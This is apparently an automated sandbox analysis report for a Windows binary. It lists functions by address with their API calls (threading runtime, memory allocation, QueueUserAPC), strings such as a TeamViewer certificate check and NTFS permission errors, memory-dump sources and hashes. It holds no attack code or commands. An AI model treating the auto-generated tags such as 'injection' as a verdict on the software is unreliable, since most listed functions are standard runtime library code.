Opcode ID: 66855fe30f840214ba352908b01601e02f061417e45aa27aa0ba5c63ae0cca67
Instruction ID: 5f12099eb52dba773e62d31fa8fed5cb31f51d65522e40f400dd0f6447440a83
Opcode Fuzzy Hash: 66855fe30f840214ba352908b01601e02f061417e45aa27aa0ba5c63ae0cca67
Instruction Fuzzy Hash: 1441A371D00609ABCB10DF95C841BDEB7FCFB19314F10456BE810A3741EBB8A904CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004A0DDD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 004A0E3A
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 004A0E46
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 004A0E5F
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 004A0E8D
Concurrency::Context::Block.LIBCONCRT ref: 004A0EAF

Strings

LM, xrefs: 004A0E4E

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: LM
API String ID: 1182035702-1111050190
Opcode ID: 3c7b759c910c60d35afa5a2acbf4c061926e6694c5f9e1433c5b1c5f4fc257b0
Instruction ID: c98274ac84e690d7fb4426752aad7527049111dd17440232a696763e8e47b5fc
Opcode Fuzzy Hash: 3c7b759c910c60d35afa5a2acbf4c061926e6694c5f9e1433c5b1c5f4fc257b0
Instruction Fuzzy Hash: DB218070C00205CADF24DFA4C8556EFBBF0AF26314F104A2FE055A6291EB794E45DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004A3804, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 004A3847

Part of subcall function 004A4D65: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 004A4DB4

GetCurrentThread.KERNEL32 ref: 004A3851
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004A385D

Part of subcall function 0049854D: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 0049855F

Part of subcall function 00498A10: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00498A17

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 004A38A0

Part of subcall function 004A4D17: SetEvent.KERNEL32(?,?,004A38A5,004A4646,00000000,?,00000000,004A4646,00000004,004A4D0C,?,00000000,?,?,00000000), ref: 004A4D5B

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 004A38A9

Part of subcall function 004A4323: List.LIBCONCRT ref: 004A4359

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 004A38B9

Strings

~`|+, xrefs: 004A380A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID: ~`|+
API String ID: 318399070-3443854377
Opcode ID: 96a64fe96a71037e2e59f83740494f159cee2178eb7dac2480d3777a18a7a883
Instruction ID: 466f323d89e9666698ef18f866893f6c33a1217c62a89738305de9451ac6d601
Opcode Fuzzy Hash: 96a64fe96a71037e2e59f83740494f159cee2178eb7dac2480d3777a18a7a883
Instruction Fuzzy Hash: 7D21AC315007119FCB24EF6AC9508AFF3F9FFA9704700496EF84297651DB78AA05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00437300, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,000000FF,00000000,000000FF), ref: 0043733C
CloseHandle.KERNEL32(?), ref: 00437345
TerminateThread.KERNEL32(?,00000000), ref: 0043735C
QueueUserAPC.KERNEL32(0042ADD0,?,00000000), ref: 00437369
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00437374
CloseHandle.KERNEL32(?), ref: 00437388

Strings

~`|+, xrefs: 00437303

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleWait$MultipleObjectObjectsQueueSingleTerminateThreadUser
String ID: ~`|+
API String ID: 3743911766-3443854377
Opcode ID: 3e2aeac9efecabc4cafe98ef9973ae058c5607f3aeb89519720203e6a6b9aa4a
Instruction ID: b4d3cf67189af9f0123b01e2f5f1d99131947b5d67772ef2b3288eef18e402af
Opcode Fuzzy Hash: 3e2aeac9efecabc4cafe98ef9973ae058c5607f3aeb89519720203e6a6b9aa4a
Instruction Fuzzy Hash: 9111B131504311AFDB209F18DC45B26B7F4FF49B21F14462AFE5597290D735AC04DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00454CEC, Relevance: 12.2, APIs: 8, Instructions: 162COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00454D2E
DName::operator+.LIBCMT ref: 00454D96
DName::operator+.LIBCMT ref: 00454DE9

Part of subcall function 00453B9A: shared_ptr.LIBCMT ref: 00453BB6

Part of subcall function 00453AC5: DName::operator+.LIBCMT ref: 00453AE6

DName::operator+.LIBCMT ref: 00454DDA
DName::operator+.LIBCMT ref: 00454E52
DName::operator+.LIBCMT ref: 00454E5F
DName::operator+.LIBCMT ref: 00454E82

Part of subcall function 00453B78: DName::operator+=.LIBCMT ref: 00453B8E

DName::operator+.LIBCMT ref: 00454E8F

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$Name::operator+=shared_ptr
String ID:
API String ID: 3124448293-0
Opcode ID: ba7431904f5c2e714b1908eac006750feb57ec66e30870c31f5dfbd95fd1abee
Instruction ID: 6c89e1e6d4c299c0f359e22342d60416807dd07899fb5a3e337f2df1731d40f4
Opcode Fuzzy Hash: ba7431904f5c2e714b1908eac006750feb57ec66e30870c31f5dfbd95fd1abee
Instruction Fuzzy Hash: F2518871D00208ABCF15DF95C845EEE77B8AF88745F04405FF901A7282DB78AA4CCB68

Uniqueness

Uniqueness Score: -1.00%

Function 0044EBDF, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,00000000,0044ED88,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC03
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC0A

Part of subcall function 0044ECD5: IsProcessorFeaturePresent.KERNEL32(0000000C,0044EBF1,00000000,00000000,0044ED88,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ECD7

InterlockedPopEntrySList.KERNEL32(00000000,00000000,00000000,0044ED88,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC1A
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,?,?,?,?,?,0000000C), ref: 0044EC41
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC55
InterlockedPopEntrySList.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC68
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,0000000C), ref: 0044EC7B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 96b99650878ccd9523c8ba2e96f91379cd9b5521b3253ed772c96e3091c401e7
Instruction ID: eda18b16519771e628728205a29491167c44e7a1a9583846c7a1701d6d13862a
Opcode Fuzzy Hash: 96b99650878ccd9523c8ba2e96f91379cd9b5521b3253ed772c96e3091c401e7
Instruction Fuzzy Hash: CD11E771740622BBF7211B6AAD88F67366DFF44781F100132FE06D6251DA29CC5197AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042C4E0, Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

VerifyTeamViewerCertificate(): CryptHashCertificate2 failed, xrefs: 0042CD7B
, xrefs: 0042CD42
SHA256, xrefs: 0042CD5A
~`|+, xrefs: 0042BED7, 0042C4F7, 0042CE97

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $SHA256$VerifyTeamViewerCertificate(): CryptHashCertificate2 failed$~`|+
API String ID: 0-2583837549
Opcode ID: 4ad76b4884a208e22f12b43a26583a3866fa8461a83be9d160b9b5555c24b562
Instruction ID: b4636b30612436dd313f9c4af5988318ad39c9d8fa13c87703a8efc5ae279307
Opcode Fuzzy Hash: 4ad76b4884a208e22f12b43a26583a3866fa8461a83be9d160b9b5555c24b562
Instruction Fuzzy Hash: B5A19070E00218ABEB10DFA5DD89BEEBBB5FF05708F50412AE505B7290EB786944CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044E76C, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,0044DDC4,?,00000100,?), ref: 0044E7B4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,?,00000000,00000000,?,0044DDC4,?,00000100,?,00000001,?,00000003,?,00000001), ref: 0044E824
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000003,?,00000000,00000000,?,?,?,?,?,?,00000003,?), ref: 0044E8FA
__freea.LIBCMT ref: 0044E903
__freea.LIBCMT ref: 0044E90E

Strings

~`|+, xrefs: 0044E771

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$__freea
String ID: ~`|+
API String ID: 2689816821-3443854377
Opcode ID: ddcb41169157a18f7b70a66224e48eab0b9a1011e96928985b317bf793aea084
Instruction ID: ab4433dd3c22de4eb81012e89e558b5b9e968dcca0184d12c78ef01072adc9f6
Opcode Fuzzy Hash: ddcb41169157a18f7b70a66224e48eab0b9a1011e96928985b317bf793aea084
Instruction Fuzzy Hash: 2F51D0B250020AAFFF206F67CC45EAB7BA9FF40750F15052AFD04D7291E7398C118AA8

Uniqueness

Uniqueness Score: -1.00%

Function 004360C0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,2B7C607E), ref: 00436112
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0043617D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,00000000,00000000), ref: 004361D8
LocalFree.KERNEL32(00000000,-00000001,00000000), ref: 0043629C

Strings

Unknown error (%d), xrefs: 0043611D
~`|+, xrefs: 004360D4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$FormatFreeLocalMessage
String ID: Unknown error (%d)$~`|+
API String ID: 1902725900-1453741986
Opcode ID: 29c8bef085ca5249e392551b71a21059bc4e4e046e7be71c4b6d9d3a9bab57f5
Instruction ID: 00f59657725525e8d8a441e6ebff32da5d290a6cbf5afaf6d455c01aaf860d8d
Opcode Fuzzy Hash: 29c8bef085ca5249e392551b71a21059bc4e4e046e7be71c4b6d9d3a9bab57f5
Instruction Fuzzy Hash: 1751BD30A0425AAFEF14DFD5CC15BAEBBB4FF09304F11421AF511AA2C5DBB86904CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004AB620, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 004AB639

Part of subcall function 004AB931: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004AB370), ref: 004AB941

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 004AB64E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004AB65D
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004AB730

Strings

switchState, xrefs: 004AB655
pContext, xrefs: 004AB728

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: cd067d33d6c0d2f6b551176d639812ec822ab7ab85d84851b0fc6d3d24ea340c
Instruction ID: 4d936f16debb05669b8ce423b9bfdc05b2a60a5ca7f1fea8abc145813891e3f8
Opcode Fuzzy Hash: cd067d33d6c0d2f6b551176d639812ec822ab7ab85d84851b0fc6d3d24ea340c
Instruction Fuzzy Hash: 14310435A00204ABCF04EF69C891AAE7379EF69314F24446BED119B343DB78ED018BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00446090, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004460C6
std::_Lockit::_Lockit.LIBCPMT ref: 004460E6
std::_Lockit::~_Lockit.LIBCPMT ref: 00446106
std::_Facet_Register.LIBCPMT ref: 004461A3
std::_Lockit::~_Lockit.LIBCPMT ref: 004461C4

Strings

~`|+, xrefs: 004460A4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: ~`|+
API String ID: 459529453-3443854377
Opcode ID: 6b84472d8214d8854d345d2b477d72664e9eb4626d081a69a53ee09dd890f2be
Instruction ID: ea1a99d5a41a4e1135e26f65edca0253570faa4f23eed29d70758e1ed0539d33
Opcode Fuzzy Hash: 6b84472d8214d8854d345d2b477d72664e9eb4626d081a69a53ee09dd890f2be
Instruction Fuzzy Hash: A641CC71A002189FEB11DF54D981BBEB7B0FB45714F16406EE806AB342CB38AD05CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004A811D, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 004A8145

Part of subcall function 004A7EA8: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 004A7EDB
Part of subcall function 004A7EA8: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 004A7EFD

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004A81C2
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 004A81CE
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 004A81DD
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 004A81E7
Concurrency::location::_Assign.LIBCMT ref: 004A821B
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 004A8223

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 3bfde7710d4890399da7d290b040d2aa6e63954ca3d766fde1fd82384d567d07
Instruction ID: 9615e065dda5f07bff8bf43f36ad767c62d451b9a9328b8dbce068ed9e466a45
Opcode Fuzzy Hash: 3bfde7710d4890399da7d290b040d2aa6e63954ca3d766fde1fd82384d567d07
Instruction Fuzzy Hash: 4A414A35A00204AFCF05EF64C485BAEB7B5FF59304F5484AADD49AB342DB38AD01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00463716, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 00463781
api-ms-, xrefs: 0046376D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: b11a5ef699e81d4bd38237c0cf6f3239bc62fc0f8b59ca1aaf5b7249b7552152
Instruction ID: 69bc34c69bcfaaaa51f4bf316eec4533a07e78bbc9c947df1c82469a3635ebbd
Opcode Fuzzy Hash: b11a5ef699e81d4bd38237c0cf6f3239bc62fc0f8b59ca1aaf5b7249b7552152
Instruction Fuzzy Hash: 8621DBF5A01250ABDB219F259C80B2B37649B11B63F244527E916A7391F638FE00C5DE

Uniqueness

Uniqueness Score: -1.00%

Function 004593B7, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 00459407
~`|+, xrefs: 004593B7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$~`|+
API String ID: 0-2639318384
Opcode ID: 6c859aa92ec3f56ff2aa0bfcc510954ab0f6d1e39a72fe61256e9367cc9bc230
Instruction ID: e4b593af20f76e562826e784ee75eb15b75594600b62fa271a93e445dcd20ee5
Opcode Fuzzy Hash: 6c859aa92ec3f56ff2aa0bfcc510954ab0f6d1e39a72fe61256e9367cc9bc230
Instruction Fuzzy Hash: DF110F31909221EBCB315B299C4065F3758AF07766F150123ED09A7392D738ED06C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004395E0, Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 00439611
CloseHandle.KERNEL32(00000000), ref: 004397C0
CloseHandle.KERNEL32(00000000), ref: 004397D4
CloseHandle.KERNEL32(00000000), ref: 0043974B

Part of subcall function 0043B360: CloseHandle.KERNEL32(00000000,?,0043AACC,00000000,?,?,004397E4), ref: 0043B371
Part of subcall function 0043B360: CloseHandle.KERNEL32(?,?,0043AACC,00000000,?,?,004397E4), ref: 0043B385

CloseHandle.KERNEL32(00000000), ref: 004398D3

Strings

startup, xrefs: 004398E4, 0043992A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: startup
API String ID: 2962429428-3834532086
Opcode ID: b1f5d2b0c8c408a2bf2450363365c95b0960dc9ad8183642711e3e938fdf06a7
Instruction ID: e6c26cc06e699c43d42e4e876f2831ff436855f9016b81248e244d2d7ba47b95
Opcode Fuzzy Hash: b1f5d2b0c8c408a2bf2450363365c95b0960dc9ad8183642711e3e938fdf06a7
Instruction Fuzzy Hash: 9881BF716101189BDB089F28DED873A33A6EF89314F54652EE502CB3A0DB7CAC55CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 004424E0, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 004425EB
LocalFree.KERNEL32(00000000), ref: 004425F4

Strings

GrantNTFSPermissions(): SetNamedSecurityInfoW failed, xrefs: 004425D5
GrantNTFSPermissions(): GetNamedSecurityInfo failed, xrefs: 0044261D
~`|+, xrefs: 004424F4
GrantNTFSPermissions(): SetEntriesInAcl failed, xrefs: 004425A2

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
